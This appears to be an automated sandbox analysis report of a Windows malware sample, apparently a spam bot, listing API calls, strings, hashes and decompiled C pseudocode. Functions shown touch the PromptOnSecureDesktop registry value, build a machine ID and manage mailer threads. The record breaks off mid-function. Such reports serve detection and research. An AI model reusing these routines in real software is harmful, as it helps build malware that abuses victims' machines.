0x0040e2e9
0x0040e241
0x0040e186
0x0040e187
0x0040e18d
0x00000000
0x00000000
0x00000000

APIs

WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D

Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Strings

PromptOnSecureDesktop, xrefs: 0040E28A, 0040E28F, 0040E2D0, 0040E2FA

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseValue$CreateDeleteFileHandleWrite
String ID: PromptOnSecureDesktop
API String ID: 4151426672-2980165447
Opcode ID: 74bfa5d46f72066c0740cecac4665153b7eb7eee929cf71857195b4955d77ed2
Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
Opcode Fuzzy Hash: 74bfa5d46f72066c0740cecac4665153b7eb7eee929cf71857195b4955d77ed2
Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD

Uniqueness

Uniqueness Score: -1.00%

Function 02238319, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 022383AF
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02238460

Part of subcall function 022369AC: SetFileAttributesA.KERNEL32(?,00000080), ref: 022369CE
Part of subcall function 022369AC: SetFileAttributesA.KERNEL32(?,00000002), ref: 02236A0F
Part of subcall function 022369AC: GetFileSize.KERNEL32(000000FF,00000000), ref: 02236A23

Part of subcall function 0223EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,02231DB8,?), ref: 0223EE91
Part of subcall function 0223EE7E: HeapFree.KERNEL32(00000000), ref: 0223EE98

Strings

PromptOnSecureDesktop, xrefs: 0223839B, 022383A0, 0223846C

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeOpenProcessSize
String ID: PromptOnSecureDesktop
API String ID: 359188348-2980165447
Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction ID: 328380cf3c779d1eaad8e8285d8168271d8e5418826e32f5f9e64312929baaed
Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction Fuzzy Hash: A24184F2910209BEDB12EBD09E80AFE77BDDB04314F04446AF604EA018E7745A948B56

Uniqueness

Uniqueness Score: -1.00%

Function 0223E61A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,0223E842,00000000,00020119,0223E842,PromptOnSecureDesktop), ref: 0223E636
RegCloseKey.ADVAPI32(0223E842,?,?,?,?,000000C8,000000E4), ref: 0223E770

Strings

PromptOnSecureDesktop, xrefs: 0223E620

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CloseOpen
String ID: PromptOnSecureDesktop
API String ID: 47109696-2980165447
Opcode ID: f61ddc5fe900490089b43df4e89b4b1cbb63eb5d6baf2ed008f95bfe870cb9e3
Instruction ID: b72696f1d7204cfa2fcf595547816820f0f4f59da65a23431f3977de4388461d
Opcode Fuzzy Hash: f61ddc5fe900490089b43df4e89b4b1cbb63eb5d6baf2ed008f95bfe870cb9e3
Instruction Fuzzy Hash: 4841F7F2D1021EAFEF12AFD4DD80DEEBBB9EF04304F114066EA10B2154E3319A558B60

Uniqueness

Uniqueness Score: -1.00%

Function 0223AFD9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0223AFE8
SystemTimeToFileTime.KERNEL32(?,?), ref: 0223AFF6

Part of subcall function 0223AF58: gethostname.WS2_32(?,00000080), ref: 0223AF6C
Part of subcall function 0223AF58: lstrcpy.KERNEL32(?,00410B90), ref: 0223AFCF

Part of subcall function 02233305: gethostname.WS2_32(?,00000080), ref: 02233328
Part of subcall function 02233305: gethostbyname.WS2_32(?), ref: 02233332

Part of subcall function 0223A9F3: inet_ntoa.WS2_32(00000000), ref: 0223A9F9

Strings

%OUTLOOK_BND_, xrefs: 0223B05F, 0223B064, 0223B0A7, 0223B0C6

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %OUTLOOK_BND_
API String ID: 1981676241-3684217054
Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction ID: a25b55668d1c10ed6657d00881d55c5d7d1835202db23f8a8d49c00ca2bdbe9a
Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction Fuzzy Hash: A5412CB291034CABDB26AFE0DC45EEE3BADFF08304F14442AB92492155EA75E954CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0223943B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 0223951F
Sleep.KERNEL32(000001F4), ref: 02239546

Strings

, xrefs: 022394C2

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID:
API String ID: 4194306370-3916222277
Opcode ID: 3fe3a9cff56685cfc2ef6a8587b4668aa021f53b51d96722d85aa4ab8f9335b7
Instruction ID: 2e10f8f48ee4c1bfd2a675ef864c75f6eb1297b02a6353362fe4a53a85addcc9
Opcode Fuzzy Hash: 3fe3a9cff56685cfc2ef6a8587b4668aa021f53b51d96722d85aa4ab8f9335b7
Instruction Fuzzy Hash: D24115F2C283966EEB3387E8D88C7E63BA49B03324F1801E5D6969719AD7F449C0C751

Uniqueness

Uniqueness Score: -1.00%

Function 0223BC63, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0223B9C2
InterlockedIncrement.KERNEL32(00413648), ref: 0223BA23
InterlockedIncrement.KERNEL32(?), ref: 0223BA7D
GetTickCount.KERNEL32 ref: 0223BB62
GetTickCount.KERNEL32 ref: 0223BB82
InterlockedIncrement.KERNEL32(?), ref: 0223BDFE
closesocket.WS2_32(00000000), ref: 0223BE9D

Strings

%FROM_EMAIL, xrefs: 0223BC66

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CountIncrementInterlockedTick$closesocket
String ID: %FROM_EMAIL
API String ID: 1869671989-2903620461
Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction ID: 98a468589e28a25b7c24723af4a2e308908f2b8d47b34942a0dbfc17cafb846b
Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction Fuzzy Hash: 65318DB1920248DFDF26DFE4DC84AED77E9EB45704F60402AFA2492164EB35D684CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00408CEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;

				_push(_t34);
				_t31 = 0;
				if( *0x413380 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380;
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

0x00408cf2
0x00408cf4
0x00408cfc
0x00408dae
0x00408db0
0x00408db0
0x00408d08
0x00408d13
0x00000000
0x00000000
0x00408d1b
0x00408d21
0x00408d24
0x00408d27
0x00408d2a
0x00408d2f
0x00408da1
0x00408da1
0x00408da8
0x00000000
0x00408d31
0x00408d31
0x00408d34
0x00408d37
0x00408d3c
0x00408d50
0x00408d6c
0x00408d6f
0x00408d78
0x00000000
0x00000000
0x00408d7a
0x00408d7d
0x00408d8b
0x00408d8b
0x00408d90
0x00408d9e
0x00408da0
0x00000000
0x00408d90
0x00000000
0x00408d7d
0x00408d5a
0x00408d5f
0x00408d62
0x00408d67
0x00408d67
0x00408d67
0x00000000
0x00408d62
0x00408d46
0x00000000
0x00408d7f
0x00408d7f
0x00408d83
0x00408d84
0x00000000
0x00408d89

APIs

GetTickCount.KERNEL32 ref: 00408D02
GetTickCount.KERNEL32 ref: 00408DA1

Strings

localcfg, xrefs: 00408D19

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick
String ID: localcfg
API String ID: 536389180-1857712256
Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFCE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040BFD0
wsprintfA.USER32 ref: 0040C060

Strings

Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTickwsprintf
String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
API String ID: 2424974917-1012700906
Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}

0x004038fa
0x00403989
0x0040398b
0x0040398b
0x00403905
0x0040390b
0x00403911
0x00403982
0x00403982
0x00000000
0x00403913
0x0040391b
0x00403924
0x00403926
0x0040392e
0x00403930
0x00403930
0x00403933
0x00403935
0x00403935
0x0040393b
0x0040393b
0x0040393e
0x00403947
0x0040394b
0x0040394c
0x0040394f
0x00403952
0x00403958
0x0040395a
0x00403964
0x00403966
0x0040396b
0x0040396b
0x00403964
0x00403958
0x00403975
0x00403978
0x0040397b
0x00000000
0x00403981

APIs

Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

GetCurrentThreadId.KERNEL32 ref: 00403929
GetCurrentThreadId.KERNEL32 ref: 00403939

Strings

%FROM_EMAIL, xrefs: 00403913

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentThread$CountExchangeInterlockedTick
String ID: %FROM_EMAIL
API String ID: 3716169038-2903620461
Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02237086, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 022370A5
LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 022370DD

Strings

|, xrefs: 022370CF

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Name$AccountLookupUser
String ID: |
API String ID: 2370142434-2343686810
Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction ID: cde6821c187e0c94b7c3afd97b396fd41014ebc947d6977bb986b9e1a761e188
Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction Fuzzy Hash: 9711E8F2910119EBDF22DBD5CC84ADEB7BCAB04705F1441A6E542F61A8D7709B88CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}

0x00401b7e
0x00401b84
0x00401b85
0x00401b86
0x00401b87
0x00401b89
0x00401b8c
0x00401b8d
0x00401b94
0x00401ba3
0x00401bb8
0x00401bc8
0x00401bca
0x00401bcd
0x00000000
0x00401bd8
0x00000000

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401BA3
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8

Strings

localcfg, xrefs: 00401B7B

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: localcfg
API String ID: 2777991786-1857712256
Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_push(0x413640);
							} else {
								_push(0x41363c);
							}
							_t17 = InterlockedIncrement();
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}

0x0040ab85
0x0040ab8a
0x0040ab94
0x0040ab97
0x0040ab9a
0x0040aba0
0x0040abab
0x0040abb9
0x0040abc4
0x0040abca
0x0040abd3
0x0040abdc
0x0040abd5
0x0040abd5
0x0040abd5
0x0040abe1
0x0040abe1
0x0040abe3
0x0040abe4
0x00000000
0x0040abea
0x0040abed

APIs

lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1

Strings

%FROM_EMAIL, xrefs: 0040AB8C

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: IncrementInterlockedlstrcpyn
String ID: %FROM_EMAIL
API String ID: 224340156-2903620461
Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004026B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
inet_ntoa.WS2_32(?), ref: 004026E4

Strings

localcfg, xrefs: 004026CD, 004026D2, 004026DE

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: gethostbyaddrinet_ntoa
String ID: localcfg
API String ID: 2112563974-1857712256
Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4;
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x0040eae4
0x0040eaeb
0x0040eb02
0x0040eb0d
0x0040eaed
0x0040eaf2
0x0040eaf8
0x0040eaff
0x00000000
0x0040eb01
0x0040eb01
0x0040eb01
0x0040eaff

APIs

LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000), ref: 0040EAF2
GetProcAddress.KERNEL32(?,00000000,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001), ref: 0040EB07

Strings

ntdll.dll, xrefs: 0040EAED

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: ntdll.dll
API String ID: 2574300362-2227199552
Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 02233172, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02232F71: GetModuleHandleA.KERNEL32(?), ref: 02232F8A
Part of subcall function 02232F71: LoadLibraryA.KERNEL32(?), ref: 02232F9A

GetProcessHeap.KERNEL32(00000000,00000000), ref: 022331C3
HeapFree.KERNEL32(00000000), ref: 022331CA

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction ID: 7c26564e22f4649f717930a3c18dc8bb64d61171d60d621b62f12b8d5b5f14c1
Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction Fuzzy Hash: 945190B191424AEFCB02DFA8D8849FA77B5FF05304F1445A9EC96C7224E7729A19CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00402F22, Relevance: 5.2, APIs: 4, Instructions: 157
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
